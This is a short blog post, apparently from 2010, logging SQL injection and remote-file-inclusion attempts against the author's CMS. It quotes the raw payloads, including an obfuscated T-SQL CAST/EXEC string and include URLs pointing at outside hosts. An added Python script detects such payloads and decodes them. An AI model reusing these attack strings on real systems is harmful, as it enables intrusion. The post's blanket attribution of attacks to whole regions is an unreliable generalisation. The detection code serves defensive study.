Friday, August 20, 2010

TSQL Injection Hack Attempts

I’ve been getting a lot of hack attempts on my CMS lately, mostly in the form of attempted SQL injection.
Most of the IP addresses track back to the Middle East, China, and former USSR states. I don’t know what it is about these places, but it’s almost always them.

The scary thing is seeing how the hack attempts are constantly developing and adapting.

They used to be simple, like
;or 1=1

Now we get stuff like the following:
;DeClARE%20@S%20vARChaR(4000);SET%20@S=caST([…]46364536353644364636383735363936433634363936393645324537323735324637343634373332463637364632453730363837303346373336393634334433313232323037373639363437343638334432323330323232303638363536393637363837343344323233303232323037333734373936433635334432323634363937333730364336313739334136453646364536353232334533433246363936363732363136443635334520417320564152634841722831303629292729206645546368204E6558742066524F4D207461626C655F437572736F7220496E544F2040542C406320654E6420636C6F5365207461426C655F437552734F72206445616C6C4F63617465205461626C455F435552734F7220%20AS%20varchAR(4000));Exec(@s);--

Notice the case variations, an attempt to bypass checks for blacklisted words. And the T-SQL casting is just nightmarish.

Who writes this stuff?

More info available at: http://www.securiteam.com/securityreviews/5DP0N1P76E.html

Update:
Here are a few more address-line attacks that I'm getting:
?_SERVER[DOCUMENT_ROOT]=http://www.fileden.com/files/2009/10/26/2620908/id.txt???
?id=1813'%20and%201=1%20and%20''=' (it's not even a log-in page, WTF)
?id=1813'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20'%25'=' 
?INCLUDE_FOLDER=http://lisia.pl/libraries/pear/archive_tar/ide1.txt????
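The two things the post points out, the mixed-case `CAST(0x…)`/`EXEC` payload and the tautology, `char()` and remote-include probes in the address lines, can all be caught by matching on the URL-decoded, lower-cased query string and by decoding the hex literal so the hidden T-SQL lands in the log in clear text. This is an added example, not code from the post; the hidden statement and hostname in the samples are constructed stand-ins, and the hex literal is assumed to carry the usual `0x` prefix.

```python
import re
from urllib.parse import unquote

# Patterns are matched against the URL-decoded, lower-cased query string, so the
# mixed case in the logged payloads (DeClARE, vARChaR, caST) gives no cover.
SIGNATURES = {
    "tsql_cast_exec": re.compile(r"declare\s+@\w+.*cast\s*\(\s*0x[0-9a-f]+.*exec\s*\(", re.S),
    "tautology":      re.compile(r"'\s*(and|or)\s+\d+\s*=\s*\d+"),
    "char_probe":     re.compile(r"char\s*\(\s*\d+\s*\)\s*\+"),
    "remote_include": re.compile(r"[?&][\w\[\]]+=https?://"),
}
HEX_LITERAL = re.compile(r"cast\s*\(\s*0x([0-9a-f]+)", re.I)


def classify(query):
    """Return the names of every signature the raw query string triggers."""
    decoded = unquote(query).lower()
    return [name for name, pat in SIGNATURES.items() if pat.search(decoded)]


def decode_cast_literal(query):
    """Recover the T-SQL hidden inside CAST(0x... AS VARCHAR) so it can be logged
    in clear text; returns None when the request carries no such literal."""
    m = HEX_LITERAL.search(unquote(query))
    if not m:
        return None
    digits = m.group(1)
    if len(digits) % 2:          # odd length means the log truncated it; keep what decodes
        digits = digits[:-1]
    return bytes.fromhex(digits).decode("latin-1")


# Constructed sample requests modelled on the post's log lines; the hidden
# T-SQL and the hostname are stand-ins, not the attacker's actual payload.
INNER_SQL = "DECLARE @T varchar(255) SELECT 1 -- constructed stand-in"
HEX = INNER_SQL.encode().hex()
SAMPLES = [
    "?id=1;DeClARE%20@S%20vARChaR(4000);SET%20@S=caST(0x" + HEX + "%20AS%20varchAR(4000));Exec(@s);--",
    "?id=1813'%20and%201=1%20and%20''='",
    "?id=1813'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20'%25'='",
    "?INCLUDE_FOLDER=http://example.invalid/ide1.txt",
    "?id=1813",   # ordinary request, should trigger nothing
]

if __name__ == "__main__":
    for req in SAMPLES:
        hits = classify(req)
        print(f"{hits or ['clean']}  {req[:60]}")
        if "tsql_cast_exec" in hits:
            print("   decoded literal:", decode_cast_literal(req))
```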
